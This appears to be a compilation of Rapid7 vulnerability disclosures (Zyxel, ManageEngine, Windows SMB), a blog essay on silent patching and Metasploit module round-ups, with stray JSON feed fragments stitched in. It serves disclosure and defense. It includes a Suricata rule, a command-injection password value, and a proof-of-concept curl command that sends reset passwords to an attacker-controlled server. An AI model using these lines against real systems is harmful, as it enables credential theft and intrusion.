request](<https://github.com/rapid7/metasploit-framework/pull/16563>). 
The Metasploit module injects commands in the `mtu` field, and as such, the following Suricata rule should flag its use:

    alert http any any -> any any ( \
        msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt"; \
        flow:to_server; \
        http.method; content:"POST"; \
        http.uri; content:"/ztp/cgi-bin/handler"; \
        http.request_body; content:"setWanPortSt"; \
        http.request_body; content:"mtu"; \
        http.request_body; pcre:"/mtu[\"']\s*:\s*[\"']\s*[^0-9]+/i"; \
        classtype:misc-attack; \
        sid:221270;)

Note that the `pcre` fires on any `mtu` value whose first character is not a digit, so it will also alert on malformed but harmless requests (an empty `mtu` string, for instance); treat a hit as a reason to inspect the request body rather than as proof of exploitation.

## Credit

This issue was discovered by [Jake Baines](<https://www.rapid7.com/blog/author/jake-baines/>) of Rapid7, and it is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).

## Remediation

Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.

## Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with a remote vulnerability check.

## Disclosure timeline

Astute readers will notice this timeline is a little atypical for Rapid7 disclosures. In accordance with our 60-day [disclosure policy](<https://www.rapid7.com/security/disclosure/>), we suggested a coordinated disclosure date in June. Instead, Zyxel released patches to address this issue on April 28, 2022. At that time, Zyxel did not publish an associated CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel's uncoordinated disclosure. The vendor then reserved CVE-2022-30525.

This patch release is tantamount to releasing details of the vulnerabilities, since attackers and researchers can trivially reverse the patch to learn precise exploitation details, while defenders rarely bother to do this. Therefore, we're releasing this disclosure early in order to assist defenders in detecting exploitation and to help them decide when to apply this fix in their own environments, according to their own risk tolerances. In other words, silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues.

* **April 2022** - Discovered by Jake Baines
* **April 13, 2022** - Rapid7 discloses to [security@zyxel.com.tw](<mailto:security@zyxel.com.tw>). Proposed disclosure date June 21, 2022.
* **April 14, 2022** - Zyxel acknowledges receipt.
* **April 20, 2022** - Rapid7 asks for an update and shares delight over ["Here is how to pronounce ZyXEL's name"](<https://www.youtube.com/watch?v=I5nT-nRHvlU>).
* **April 21, 2022** - Zyxel acknowledges reproduction of the vulnerabilities.
* **April 28, 2022** - Zyxel releases patches without coordination with the vulnerability reporter.
* **April 29, 2022** - Zyxel indicates the patch is likely to release before June 14, 2022.
* **May 9, 2022** - Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel for a response on the silent patches and indicates that our team will publicly disclose the week of May 9, 2022.
* **May 10, 2022** - Zyxel reserves CVE-2022-30525 and proposes a new disclosure schedule.
* **May 12, 2022** - [Zyxel advisory](<https://www.zyxel.com/us/en/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>), this disclosure bulletin, and Metasploit module published.
_Source: Rapid7 blog, "CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection", published 2022-05-12, <https://blog.rapid7.com/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>._

# CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)

On April 9, 2022, ManageEngine fixed [CVE-2022-28810](<https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html>) with the release of ADSelfService Plus Build 6122. The vulnerability allowed the `admin` user to execute arbitrary operating system commands and potentially allowed partially authenticated Active Directory users to execute arbitrary operating system commands via the password reset functionality. Rapid7's Managed Detection and Response (MDR) team has observed this custom scripts feature in ADSelfService Plus being abused in the wild by remote attackers with valid administrative credentials.

## Credit

This vulnerability was discovered by Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.

## Exploitation

The vulnerability arose from a feature that allowed the `admin` user to execute arbitrary operating system commands after a password reset or account lockout status update.

The example provided by the UI is `cscript test.vbs %userName% %password%`, where `test.vbs` is supposed to be a file stored in `C:\ManageEngine\ADSelfService Plus\bin` by a user with local access to the underlying operating system. In reality, any command could be stored here. An attacker who acquired the `admin` user's password (default: `admin`) could trivially achieve remote command execution this way.

For example, the attacker could use the script command `cmd.exe /c whoami`, and when a user resets their password, the command `whoami` is executed.

Rapid7 MDR has observed this technique being actively leveraged in customer environments: compromised (or default) `admin` credentials have been used to execute arbitrary OS commands in order to gain persistence on the underlying system and attempt to pivot further into the environment.

Furthermore, the `%password%` variable was passed to the configured script without sanitization. Depending on the configured script, an attacker who is able to trigger a password reset could inject arbitrary operating system commands. For example, if the admin user configured the following script:

    cmd.exe /c echo %username% %password% >> C:\ProgramData\something.txt

An attacker could inject arbitrary commands via password reset by providing a `%password%` like:

    && mkdir C:\ProgramData\helloworld && echo hi

This results in the directory `helloworld` being created in `C:\ProgramData\`.

Finally, because `%password%` isn't sanitized or obfuscated at all, the `admin` user can observe all password changes, allowing them to effectively recover valid credentials for Active Directory accounts. As a proof of concept for this, we used the `admin` account to configure the password reset script to exfiltrate the new password to a server under the attacker's control:

    cmd.exe /c curl http://10.0.0.2:1270/%userName%=%password%

The attacker's server would receive the following on password reset:

    albinolobster@ubuntu:~$ nc -lvnp 1270
    Listening on 0.0.0.0 1270
    Connection received on 10.0.0.13 62065
    GET /albinolobster=sl0wrunner! HTTP/1.1
    Host: 10.0.0.2:1270
    User-Agent: curl/7.55.1
    Accept: */*

## The patch

ManageEngine fixed this issue by no longer accepting scripts through the web interface. Post action scripts must now be placed on disk by a user with access to the underlying operating system. Furthermore, the script arguments are now base64 encoded. The post shows an updated version of the Post Action interface (screenshot not reproduced here).

## Indicators of compromise

We encourage users of ManageEngine ADSelfService Plus to inspect the value they have configured in the Post Action fields. Using the `admin` account, you can navigate to the fields by following this pattern: `Configuration -> Self Service -> Policy Configuration -> Advanced -> Password Sync`.

We also highly encourage users to upgrade as soon as possible and to change the `admin` password.

## Disclosure timeline

* **April 6, 2022:** Initially discovered in the wild via Rapid7 Managed Detection and Response (MDR) service
* **April 6, 2022:** Initial disclosure to the vendor via their [reporting portal](<https://bugbounty.zoho.com/bb/info>)
* **April 7, 2022:** Discussion with vendor about the issues, CVE assignment, and disclosure timelines
* **April 9, 2022:** ManageEngine [publishes](<https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html>) a new version of ADSelfService Plus
* **April 12, 2022:** Disclosed to CERT/CC and NCSC
* **April 14, 2022:** Rapid7 publishes their disclosure (this document)

## Rapid7 customers

[InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) customers can assess their exposure to CVE-2022-28810 with an unauthenticated vulnerability check in the April 13, 2022 content release.

[InsightIDR's](<https://www.rapid7.com/products/insightidr/>) existing detection rules (listed below) are able to identify attacks that abuse this functionality. We recommend that you review your settings for these detection rules and confirm they are turned on and set to an appropriate rule action and priority for your organization:

* Suspicious Process - Powershell Invoke-WebRequest
* Attacker Technique - Attrib Sets File Or Directory As Hidden And System
* Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command
* Suspicious Process - Zoho ManageEngine Spawns Child

We have also added the following detection rule and prioritized it as Critical:

* Attacker Technique - Hiding ScreenConnect With Attrib

Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), [Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary.
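Going back to the `%password%` injection in the Exploitation section above: the following added example (not ManageEngine's code and not from the Rapid7 post) models the post-action substitution in Python. It shows the vulnerable behaviour, raw substitution of the new password into a `cmd.exe` command line, beside a hardened variant that base64-encodes each argument, which is the approach the post says the fixed build takes. The exact encoding and template syntax the product uses are not known here and are assumed; the username and passwords are constructed.

```python
"""Model of post-action script rendering: raw %variable% substitution versus
base64-encoded arguments (added example, not ManageEngine's implementation).
Sample values are constructed."""
import base64
import re

VAR_RE = re.compile(r"%(\w+)%")   # assumed template syntax, e.g. %userName%

# cmd.exe command separators. "&&" and "||" must be tried before "&" and "|"
# so a double separator is counted once.
CMD_SEPARATOR_RE = re.compile(r"\|\||&&|[&|]")

# The template and payload from the post.
TEMPLATE = r"cmd.exe /c echo %username% %password% >> C:\ProgramData\something.txt"
INJECTED_PASSWORD = r"&& mkdir C:\ProgramData\helloworld && echo hi"


def render_unsafe(template: str, values: dict) -> str:
    """Vulnerable: values are substituted verbatim, so metacharacters in the
    new password become part of the command line that cmd.exe parses."""
    return VAR_RE.sub(lambda m: values.get(m.group(1).lower(), m.group(0)), template)


def render_base64(template: str, values: dict) -> str:
    """Hardened: every value is base64-encoded before substitution. The
    base64 alphabet (A-Z a-z 0-9 + / =) contains no cmd.exe metacharacters,
    so the script receives an opaque token it has to decode itself."""
    def encode(m: re.Match) -> str:
        raw = values.get(m.group(1).lower())
        if raw is None:
            return m.group(0)          # unknown variable: leave untouched
        return base64.b64encode(raw.encode("utf-8")).decode("ascii")
    return VAR_RE.sub(encode, template)


def count_commands(cmdline: str) -> int:
    """Number of separate commands cmd.exe would run for this line
    (1 plus the number of separators). Quoting is ignored, which is enough
    to show the injection in the post's example."""
    return 1 + len(CMD_SEPARATOR_RE.findall(cmdline))


def demo(password: str = INJECTED_PASSWORD) -> dict:
    """Render the post's template both ways for a constructed user."""
    values = {"username": "albinolobster", "password": password}   # constructed
    unsafe = render_unsafe(TEMPLATE, values)
    safe = render_base64(TEMPLATE, values)
    return {
        "unsafe": unsafe, "unsafe_commands": count_commands(unsafe),
        "safe": safe, "safe_commands": count_commands(safe),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key:16s} {val}")
```

With the post's payload, the unsafe rendering expands to three separate commands (`echo`, `mkdir`, `echo`), while the base64 rendering stays a single command because the `&&` never reaches `cmd.exe` as a separator. Encoding is not secrecy, though: an `admin` who controls the script on disk can still decode and log every new password, which is why the fix also stops accepting scripts through the web interface and why the post tells users to rotate the `admin` password.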
_Source: Rapid7 blog, "CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)", published 2022-04-14, <https://blog.rapid7.com/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>._

# CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer dereference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 [AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1>) or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

## Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of what is now CVE-2022-32230. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).

## Exploitation

CVE-2022-32230 is caused by a missing check in `srv2!Smb2ValidateVolumeObjectsMatch` to verify that a pointer is not null before reading a `PDEVICE_OBJECT` from it and passing it to `IoGetBaseFileSystemDeviceObject`. The original post includes a patch diff of the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left); the image is not reproduced here.

This function is called from the dispatch routine for an SMB2 `QUERY_INFO` request of the `FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION` class. Per the docs in MS-SMB2 section [3.3.5.20.1 Handling SMB2_0_INFO_FILE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d64e0451-64a2-425a-848e-52a7dddab7b9>), `FILE_NORMALIZED_NAME_INFORMATION` is only available when the dialect is 3.1.1. The specification reads:

"For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED."

To trigger this code path, a user would open any named pipe from the `IPC$` share and make a `QUERY_INFO` request for the `FILE_NORMALIZED_NAME_INFORMATION` class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers, where there are multiple named pipes that can be opened anonymously, such as `netlogon`. An alternative named pipe that can be used, but which does typically require permissions, is the `srvsvc` pipe.

Under normal circumstances, the `FILE_NORMALIZED_NAME_INFORMATION` class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario, which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error `STATUS_NOT_SUPPORTED`.

### Proof of concept

A proof-of-concept Metasploit module is available on [GitHub](<https://github.com/zeroSteiner/metasploit-framework/blob/feat/mod/cve-2022-32230/modules/auxiliary/dos/smb/smb_filenormalizednameinformation.rb>). It requires Metasploit version 6.2 or later.

## Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

## Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting network access to the SMB service (TCP port 445) and disabling SMB version 3 can help mitigate this flaw, since the affected `FILE_NORMALIZED_NAME_INFORMATION` path is only reachable over the 3.1.1 dialect.

## Disclosure timeline

* **April 12th, 2022** – Microsoft patches CVE-2022-32230
* **April 29th, 2022** – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
* **May 4th, 2022** – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
* **May 18th, 2022** – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
* **June 1, 2022** – Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
* **June 14th, 2022** – Rapid7 releases details in this disclosure, and Microsoft publishes [its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-32230>)
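To make the request described in the Exploitation section concrete, the following added example (not Rapid7's Metasploit module, and not Windows code) builds the SMB2 `QUERY_INFO` request body for the `FileNormalizedNameInformation` class as laid out in MS-SMB2 section 2.2.37, and models the server-side decision the post describes: the dialect gate from 3.3.5.20.1, the null dereference on a named pipe in the unpatched build, and the `STATUS_NOT_SUPPORTED` response from a patched one. It crafts bytes offline and sends nothing. The `FileId` used in the demo is a placeholder (a real one comes from a prior `CREATE` on the pipe), and the server function is a deliberately simplified model of the behaviour the post reports, not a reimplementation of `srv2.sys`.

```python
"""SMB2 QUERY_INFO request builder for FileNormalizedNameInformation plus a
simplified model of the server-side handling (added example; not the
Metasploit module and not Windows code). Field layout follows MS-SMB2."""
import struct

SMB2_0_INFO_FILE = 0x01                   # InfoType for file information
FILE_NORMALIZED_NAME_INFORMATION = 48     # FILE_INFORMATION_CLASS value
STATUS_SUCCESS = 0x00000000
STATUS_NOT_SUPPORTED = 0xC00000BB

# Negotiated dialect revision codes (MS-SMB2 2.2.3).
DIALECT_2_0_2, DIALECT_2_1, DIALECT_3_0, DIALECT_3_0_2, DIALECT_3_1_1 = (
    0x0202, 0x0210, 0x0300, 0x0302, 0x0311)

QUERY_INFO_FIXED = "<HBBIHHIII"           # 24 bytes before the 16-byte FileId


def build_query_info(file_id: bytes, info_class: int,
                     output_len: int = 1024) -> bytes:
    """SMB2 QUERY_INFO request body (MS-SMB2 2.2.37); the 64-byte SMB2 header
    that precedes it is not included. StructureSize is 41: 40 fixed bytes
    plus one byte of the variable Buffer field."""
    if len(file_id) != 16:
        raise ValueError("FileId must be 16 bytes (Persistent + Volatile)")
    return struct.pack(
        QUERY_INFO_FIXED,
        41,                  # StructureSize
        SMB2_0_INFO_FILE,    # InfoType
        info_class,          # FileInfoClass
        output_len,          # OutputBufferLength
        0,                   # InputBufferOffset
        0,                   # Reserved
        0,                   # InputBufferLength
        0,                   # AdditionalInformation
        0,                   # Flags
    ) + file_id              # FileId


def parse_query_info(data: bytes) -> dict:
    """Decode the fields a server would look at before dispatching."""
    size, info_type, info_class, out_len = struct.unpack_from("<HBBI", data, 0)
    return {"StructureSize": size, "InfoType": info_type,
            "FileInfoClass": info_class, "OutputBufferLength": out_len,
            "FileId": data[24:40]}


def server_handle_query_info(dialect: int, info_class: int,
                             is_named_pipe: bool, patched: bool) -> int:
    """Simplified model of the dispatch path described in the post.
    The post summarises the spec as: the class is only available on 3.1.1.
    A named pipe has no backing volume device object; the unpatched code
    dereferences that null pointer (modelled here as an exception, standing
    in for the bugcheck), while the patched build fails the request."""
    if info_class != FILE_NORMALIZED_NAME_INFORMATION:
        return STATUS_SUCCESS             # other classes are out of scope here
    if dialect != DIALECT_3_1_1:
        return STATUS_NOT_SUPPORTED       # dialect gate from 3.3.5.20.1
    if is_named_pipe:
        if not patched:
            raise RuntimeError("null PDEVICE_OBJECT dereference (bugcheck)")
        return STATUS_NOT_SUPPORTED       # observed response after the patch
    return STATUS_SUCCESS                 # a real on-disk file: normal use


if __name__ == "__main__":
    placeholder_fid = bytes(range(16))    # constructed; a real FileId comes from CREATE
    req = build_query_info(placeholder_fid, FILE_NORMALIZED_NAME_INFORMATION)
    print(req.hex())
    print(parse_query_info(req))
    print(hex(server_handle_query_info(DIALECT_3_1_1, FILE_NORMALIZED_NAME_INFORMATION,
                                       is_named_pipe=True, patched=True)))
```

The `server_handle_query_info` model also gives a cheap way to express the remediation advice: forcing a dialect below 3.1.1 (disabling SMB 3) never reaches the vulnerable branch, and a patched host answers `STATUS_NOT_SUPPORTED` for a pipe, which is what a remote check would look for.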
_Source: Rapid7 blog, "CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)", published 2022-06-14, <https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/>._

# The Hidden Harm of Silent Patches

Hey all. I'm about to head off to [RSAC 2022](<https://events.rapid7.com/rsac-2022/>), but I wanted to jot down some thoughts I've had lately on a particularly squirrelly issue that comes up occasionally in coordinated vulnerability disclosure (CVD): the issue of silent patches, and how they tend to help focused attackers and harm IT protectors.

In the bad old days, most major software vendors were rather notorious for sweeping vulnerability reports under the rug. They made it difficult for legitimate researchers to report vulnerabilities, often by accident, occasionally on purpose. Researchers would report bugs, and those reports would fester in unobserved space, then suddenly the proof-of-concept exploit wouldn't work any more. This was (and is) the standard silent patching model. No credit, no explanation, no CVE ID, nothing.

The justification for this approach seems pretty sensible, though. Why would a vendor go out of their way to explain what a security fix does? After all, if you know how the [patch](<https://www.rapid7.com/fundamentals/patch-management/>) works, then you have a pretty good guess at the root cause of the vulnerability and, therefore, how the exploit works. So, by publicizing these patch details, you're effectively leading attackers to the goods, based on your own documentation. Not cool, right?

So, the natural conclusion is that by limiting the technical details of a given vulnerability to merely the patch contents, and by withholding those details explained in plain language, proof-of-concept exploit code, screenshots, videos and all the rest, _you are limiting the general knowledge pool of people who actually understand the vulnerability and how to exploit it._

## Unpacking the silent patch

This sounds like a great plan, but there's a catch. When a software company releases a [patch for software](<https://www.rapid7.com/fundamentals/patch-management/>), in nearly all cases, they're not using exotic packers, they're not employing anti-forensics, and even if the patch data is encrypted and obfuscated, at some point it's got to modify the code on the running software. That means it's all available to anyone who has a running instance of the patched software and knows how to use a debugger and a disassembler. And who uses debuggers to inspect the effects of patches? Exploit developers, pretty much exclusively.

Knowing this, let's modify the expectations of the silent patch strategy: _When you silently patch, you are intending to limit knowledge of the patched vulnerability to skilled exploit devs._

It's still true that you're excluding the casual attacker (or "script kiddie," in the common parlance), and that's great and desirable. However, you're also excluding a huge population of IT protectors: [penetration testers](<https://www.rapid7.com/fundamentals/penetration-testing/>) who are paid to write and run exploits to test defenses leap to mind, in addition to the folks who write and deploy defensive technologies like vulnerability management, intrusion detection and prevention, incident detection, and all the rest. You also exclude tech journalists, academics, and policy makers who want to understand and communicate the nature of software vulnerabilities, but who aren't likely to bust out a disassembler.

Most significantly, you're excluding the most important audience for your patch: the regular IT administrators and managers who need to sort out the incoming flow of patches based on some risk and severity criteria and make the call for downtime and update scheduling based on those criteria. Not all vulnerabilities are equal, and while protectors want to get around to all of them, they need to figure out which ones to apply today and which ones can wait for the next maintenance cycle.

By the way, it's true that some of these IT professionals also have the capability to reverse-engineer your patch. In practice, people who are only interested in keeping IT humming never, ever reverse patches to see if they're worth applying. It's way too complicated and time-consuming. I've never seen a case where this is part of the decision-making process to patch now or later.

## Don't leave defenders in the dark

So now, let's reexamine the case for silent patching yet again: _When you silently patch, you are communicating vulnerability details, exclusively, to skilled, criminal attackers who are specifically targeting your product, while leaving your customers in the dark._ You are intentionally withholding information from casual attackers, secondary defenders, and your customers and users who are desperate to make informed security engineering decisions involving your product or project. Oh, and let's not forget, you're also withholding knowledge about these fixed vulnerabilities from future employees and contributors, who very well might re-introduce the same or similar bugs in your product down the road. After all, the details are secret, even from future-you.

All this is to say, silent patching is tantamount to full disclosure to a very small audience who mostly want to hurt you and your users. Fully documented patches reach the much, much larger audience of people, present and future, who want to help you and your users. While it's true that you are also offering educational opportunities to casual attackers along the way, I believe the global population of casual attackers is much, much smaller than your legitimate users and all the secondary and tertiary defenders who are on your side.

So, next time a vulnerability researcher states their intention of publishing details about their reported (and now patched) vulnerability, try to examine your urge to keep those details under wraps, and maybe even encourage them to be honest and transparent with their findings. The alternative is to build up the operational capabilities of the true criminal and espionage enterprises while degrading the decision-making power of IT protectors.
_Source: Rapid7 blog, "The Hidden Harm of Silent Patches", published 2022-06-06, <https://blog.rapid7.com/2022/06/06/the-hidden-harm-of-silent-patches/>._

# Metasploit Weekly Wrap-Up

## Zyxel firewall unauthenticated command injection

This week, our very own [Jake Baines](<https://github.com/jbaines-r7>) added an exploit module that leverages [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>), an unauthenticated remote command injection vulnerability in Zyxel firewalls with zero touch provisioning (ZTP) support. Jake is also the author of the original research and [advisory](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) that was published last week. This module allows an attacker to achieve arbitrary code execution as the `nobody` user on affected devices. It takes advantage of unsanitized user input that feeds the Python `os.system` method behind the scenes. Well done Jake!

## SAML credentials generator for vCenter Server

Community contributor [npm-cesium137-io](<https://github.com/npm-cesium137-io>) added an auxiliary module that forges valid SAML credentials for vCenter Server. These credentials are very useful since they can be used to gain access to the SSO domain as a vSphere administrator. Note that this module cannot run offline and must be executed while the target vCenter is reachable over the network to properly acquire the administrator session token. Also, the vCenter SSO Identity Provider (IdP) trusted certificate chain needs to be provided. This can be extracted manually from the `vmdir` database file at `/storage/db/vmware-vmdir/data.mdb` using [`binwalk`](<https://github.com/ReFirmLabs/binwalk>) or using this post [module](<https://github.com/rapid7/metasploit-framework/pull/16465>), which is still in review at the time of writing.

## GSOC 2022

The Metasploit project was accepted again for the Google Summer of Code program. This year the team welcomes back [pingport80](<https://github.com/pingport80>) as a returning contributor and [3V3RYONE](<https://github.com/3V3RYONE>). These students will be working on Post API improvements and expanded HTTP-Trace support respectively. We look forward to mentoring and working with them in the coming months, so stay tuned for further updates as they get started!

## New module content (3)

* [VMware vCenter Forge SAML Authentication Credentials](<https://github.com/rapid7/metasploit-framework/pull/16484>) by npm - This module forges valid SAML credentials for vCenter Server using the vCenter SSO IdP certificate, IdP private key, and VMCA root certificate as input objects.
* [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>) - A new module has been added to exploit CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user.
* [Bookmarked Sites Retriever](<https://github.com/rapid7/metasploit-framework/pull/16406>) by jerrelgordon - This adds a module to retrieve the bookmarks from Internet Explorer, Opera, Google Chrome, and Edge.

## Enhancements and features (3)

* [#16430](<https://github.com/rapid7/metasploit-framework/pull/16430>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This adds support for logging AS-REP Roastable accounts, as well as storing the generated Kerberos token within the creds database. It additionally improves error handling.
* [#16442](<https://github.com/rapid7/metasploit-framework/pull/16442>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) - This adds a new `vars_form_data` field to the Rex HTTP Client for uploading files/form values to a remote HTTP server with ease:

        vars_form_data = [
          { 'name' => 'nsp', 'data' => @csrf_token },
          { 'name' => 'upload', 'data' => 1 },
          { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },
          { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }
        ]

        res = send_request_cgi(
          'method' => 'POST',
          'uri' => uri,
          'vars_form_data' => vars_form_data
        )

* [#16555](<https://github.com/rapid7/metasploit-framework/pull/16555>) from [zeroSteiner](<https://github.com/zeroSteiner>) - This moves a duplicated `retry_until_truthy` function into a centralized location for better reuse. This function is useful for retrying operations that may fail the first time, such as checking whether Kubernetes containers are ready yet.

## Bugs fixed (6)

* [#16487](<https://github.com/rapid7/metasploit-framework/pull/16487>) from [red0xff](<https://github.com/red0xff>) - This fixes a deprecation warning in the `auxiliary/capture/server/mssql` module and makes it output a valid John the Ripper format for offline password cracking.
* [#16499](<https://github.com/rapid7/metasploit-framework/pull/16499>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indication (SNI) extension was in use.
* [#16505](<https://github.com/rapid7/metasploit-framework/pull/16505>) from [AdrianVollmer](<https://github.com/AdrianVollmer>) - This fixes an issue in the `auxiliary/scanner/lotus/lotus_domino_hashes` `#dump_hashes` parsing logic.
* [#16570](<https://github.com/rapid7/metasploit-framework/pull/16570>) from [ssst0n3](<https://github.com/ssst0n3>) - This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.
* [#16572](<https://github.com/rapid7/metasploit-framework/pull/16572>) from [zeroSteiner](<https://github.com/zeroSteiner>) - A bug has been fixed whereby a `PayloadSpaceViolation` exception might be raised when the `--smallest` flag was used with `msfvenom`, due to `msfvenom` setting the space available to 0 instead of a positive number. The code now appropriately accounts for this case.
* [#16588](<https://github.com/rapid7/metasploit-framework/pull/16588>) from [zeroSteiner](<https://github.com/zeroSteiner>) - This adds a size check to the two new PowerShell adapter payload modules, ensuring that payloads that are too large (like unstaged Meterpreters) are marked as incompatible.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`, and you can get more details on the changes since the last blog post from GitHub:

* [Pull Requests 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-12T07%3A30%3A04-05%3A00..2022-05-19T09%3A28%3A41-05%3A00%22>)
* [Full diff 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/compare/6.1.42...6.1.43>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-20T19:14:42", "id": "RAPID7BLOG:DF545F327BFBC593DA87AAE7B9428479", "href": "https://blog.rapid7.com/2022/05/20/metasploit-weekly-wrap-up-157/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-26T21:31:02", "description": "## ManageEngine ADSelfService Plus Authenticated RCE\n\n\n\nThis module is pretty exciting for us because it's for a vulnerability discovered by our very own Rapid7 researchers [Jake Baines](<https://github.com/jbaines-r7>), Hernan Diaz, Andrew Iwamaye, and Dan Kelly. \nThe vulnerability allowed for attackers to leverage the "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords. \nI won't go into too much depth though because we have a whole blog post [here](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>) for you to check out with all the details! \nOh, and I almost forgot to mention this module comes with a brand new `jjs_reverse_tcp` payload too.\n\n## Who watches the watch_queue?\n\nThis week we've also brought you an LPE for Linux via the watch_queue event notification system. 
The module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18, but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.

## New module content (2)

 * [Watch Queue Out of Bounds Write](<https://github.com/rapid7/metasploit-framework/pull/16422>) by Jann Horn, bonfee, and bwatters-r7, which exploits [CVE-2022-0995](<https://attackerkb.com/topics/GnizqM74Hx/cve-2022-0995?referrer=blog>)
 * [ManageEngine ADSelfService Plus Custom Script Execution](<https://github.com/rapid7/metasploit-framework/pull/16475>) by Andrew Iwamaye, Dan Kelley, Hernan Diaz, and Jake Baines, which exploits [CVE-2022-28810](<https://attackerkb.com/topics/CgexXyr25c/cve-2022-28810?referrer=blog>) - This adds an exploit for CVE-2022-28810, an authenticated RCE in ManageEngine ADSelfService Plus.

## Enhancements and features (6)

